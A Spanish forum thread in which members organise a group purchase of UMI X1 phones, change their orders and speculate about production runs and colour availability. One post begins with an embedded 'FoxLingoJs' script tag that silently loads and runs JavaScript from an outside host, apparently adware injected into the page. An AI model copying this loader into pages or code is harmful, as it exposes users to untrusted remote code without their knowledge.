Conjunta UMI X1

Hola, @joseadrianpeluko

Antes de nada, muchas gracias por el trabajo que te estás dando. Lamentablemente el Nokia 5800 de mi mujer ha dicho basta y no puedo esperar al envío de un móvil desde china y he tenido que pedir un Nexus en Amazon.es; me cuesta el doble que el UMI pero llegará el día 27, dentro de dos días. Por favor, dame de baja de la conjunta, aunque seguiré revisando este hilo para ver cómo queda esta compra.

Estoy en la fila 38 de la lista.
Muchas gracias de nuevo y un saludo a todos.

@joseadrianpeluko

Ya me ha llegado el Nexus para mi mujer. Por favor, borrame de la lista que veo que aún estoy apuntado.
 
Última edición por un moderador:

No pillaremos ninguno de los que salgan ya que son bastante pocos, pero dijeron que el dia 28 sacarían 20000 unidades a la venta y lo han hecho. Eso ya es algo, no ha habido ni investigaciones del gobierno, ni cambios de hard de ultima hora, etc, etc... que retrasaran una y otra vez el tema.
Esperemos que las siguientes partidas de telefonos sean mayores y permitan a las tiendas abastecer en condiciones.
Mensaje para los impacientes: Si no he entendido mal en la pagina de UMI, tenian 58000 preorders, ademas empezarán a enviar los telefonos que han sacado hoy a la venta a partir del dia 15 de Octubre. Asi que imaginaros si hay que echarle paciencia.
 
Última edición por un moderador:
No pillaremos ninguno de los que salgan ya que son bastante pocos, pero dijeron que el dia 28 sacarían 20000 unidades a la venta y lo han hecho. Eso ya es algo, no ha habido ni investigaciones del gobierno, ni cambios de hard de ultima hora, etc, etc... que retrasaran una y otra vez el tema.
Esperemos que las siguientes partidas de telefonos sean mayores y permitan a las tiendas abastecer en condiciones.
Mensaje para los impacientes: Si no he entendido mal en la pagina de UMI, tenian 58000 preorders, ademas empezarán a enviar los telefonos que han sacado hoy a la venta a partir del dia 15 de Octubre. Asi que imaginaros si hay que echarle paciencia.

Referente a los colores,segun el marketing lo mejor es sacar un color o dos como mucho y el resto de colores en accesorios...asi venden el telefono y despues venden los accesorios,tienen varias ventas aseguradas
Es que son chinos...no tontos!
Sobre la optimizacion del telefono,algun fallo tendran las pantallas o el hardware de los modelos con resolucion 1280x800 ya que solo la saca en 4-5 modelos de todas las marcas chinas.Lo que me pregunto es:tonguewink:orque tan pocas marcas con la resolucion de pantalla 1280x800 y 1G Ram,falta de suministro o problemas de optimizacion???

Saludos
 
Me apunto uno en negro mas batería i accesorios, ánimos que esta vez si que lo pillamos :blush:
 
Última edición por un moderador:
<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>Hola @joseadrianpeluko, me apunto a uno negro con bateria extra, gracias.
 
Última edición por un moderador:
@joseadrianpeluko buenos días, estoy en la posición 48, cambiame el telefono de color rosa por uno negro que a la parienta no le gusta el rosita, vaya tela... ahh el otro blanco dejamele asi, que ese es para mi.
Un saludo y buen trabajo.
 
Última edición por un moderador:
Referente a los colores,segun el marketing lo mejor es sacar un color o dos como mucho y el resto de colores en accesorios...asi venden el telefono y despues venden los accesorios,tienen varias ventas aseguradas
Es que son chinos...no tontos!
Sobre la optimizacion del telefono,algun fallo tendran las pantallas o el hardware de los modelos con resolucion 1280x800 ya que solo la saca en 4-5 modelos de todas las marcas chinas.Lo que me pregunto es:tonguewink:orque tan pocas marcas con la resolucion de pantalla 1280x800 y 1G Ram,falta de suministro o problemas de optimizacion???

Saludos
Por lo que respondes creo me estas contestando al mensaje del hilo del UMI y no al que citas de la conjunta. Lo digo por lo de los colores y los bugs.
De todas maneras no te entiendo con lo de los colores. En la pagina sale un movil negro, un blanco y uno rosa. Se supone que tendran que comercializar los tres no? y no sacar los dos primeros y luego una funda rosa pal que la quiera. PErdona si no era eso lo que querias decir, es lo que te he entendido yo :slow:

Yo tengo una teoria. Como andan bastante cortos de produccion se han centrado en las primeras tandas en los modelos con mas demanda (negro y blanco), simplemente echando una mirada a la conjunta en la que de mas de 200 moviles hay pedidos 12 rosas pues ya vemos que no es de lo mas demandado. Y mas adelante lo incorporarán a la venta. Me parecería muy poco profesional publicitarlo en la página oficial y que luego no lo vendieran, que tampoco han sacado 8 colores, que son solo 3.
Esa es mi teoria contestandome a lo que yo mismo pregunto :brigade.baka-wolf.c
 
Por lo que respondes creo me estas contestando al mensaje del hilo del UMI y no al que citas de la conjunta. Lo digo por lo de los colores y los bugs.
De todas maneras no te entiendo con lo de los colores. En la pagina sale un movil negro, un blanco y uno rosa. Se supone que tendran que comercializar los tres no? y no sacar los dos primeros y luego una funda rosa pal que la quiera. PErdona si no era eso lo que querias decir, es lo que te he entendido yo :slow:

Yo tengo una teoria. Como andan bastante cortos de produccion se han centrado en las primeras tandas en los modelos con mas demanda (negro y blanco), simplemente echando una mirada a la conjunta en la que de mas de 200 moviles hay pedidos 12 rosas pues ya vemos que no es de lo mas demandado. Y mas adelante lo incorporarán a la venta. Me parecería muy poco profesional publicitarlo en la página oficial y que luego no lo vendieran, que tampoco han sacado 8 colores, que son solo 3.
Esa es mi teoria contestandome a lo que yo mismo pregunto :brigade.baka-wolf.c

Tienes razon,con el lio de colgar noticias en los dos hilos te he contestado en el hilo equivocado,pero bueno...no pasa nada,jeje
Referente a los colores es verdad lo que dices pero seguro que el rosa saldra mas adelante,lo que les interesa es ponerlo YA a la venta y con los colores de mayor aceptacion y cuando se estabilizaran las ventas sacan el rosa,creo.
Mientras tanto solo tienes la opcion de accesorio.

Saludos
 
Hola a tod@s
¿Cómo se sabe cuantos pre-orders hay? y ¿Cómo se sabe si esos pre-oreders son de particulares o de las webs distribuidoras (como Aliexpress p.e.) que quieren hacer acopio?

Un saludo
 

Del blog

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba